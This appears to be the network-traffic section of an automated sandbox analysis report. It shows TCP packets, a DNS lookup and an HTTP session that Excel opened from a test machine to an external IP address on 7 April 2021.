---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 07:09:58.570271015 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:58.731540918 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:58.731767893 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:58.734183073 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:58.895291090 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.150906086 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.150963068 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151001930 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151041031 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151087999 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151182890 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.151196003 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151231050 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151268959 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.151279926 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151288033 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.151295900 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.151323080 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151324034 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.151360989 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.151386976 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.151423931 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.160433054 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.312427998 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312494993 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312555075 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312594891 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312637091 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312685966 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312741041 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.312743902 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312792063 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.312798977 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.312808990 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312880039 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312880993 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.312942982 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.312952042 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313030005 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313090086 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313144922 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313150883 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313179016 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313184977 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313210011 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313215971 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313268900 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313287020 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313325882 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313344002 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313396931 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313447952 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313517094 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313520908 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313579082 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313591003 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313637018 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.313644886 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.313698053 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.317688942 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474539995 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474606991 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474649906 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474699974 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474726915 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474759102 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474802971 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474808931 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474823952 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474827051 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474881887 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474884033 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.474953890 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.474935055 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475022078 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475024939 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475086927 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475095987 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475142002 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475143909 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475197077 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475202084 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475260019 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475289106 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475316048 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475337982 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475347042 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475374937 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475425005 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475431919 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475496054 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475500107 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475553989 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475559950 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475617886 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475634098 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475676060 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 07:09:59.475703955 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475730896 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 07:09:59.475733995 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 07:09:58.392280102 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 07:09:58.546928883 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 07:09:58.392280102 CEST | 192.168.2.22 | 8.8.8.8 | 0x7e45 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 07:09:58.546928883 CEST | 8.8.8.8 | 192.168.2.22 | 0x7e45 | No error (0) | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 07:09:58.734183073 CEST | 0 | OUT | |
Apr 7, 2021 07:09:59.150906086 CEST | 2 | IN |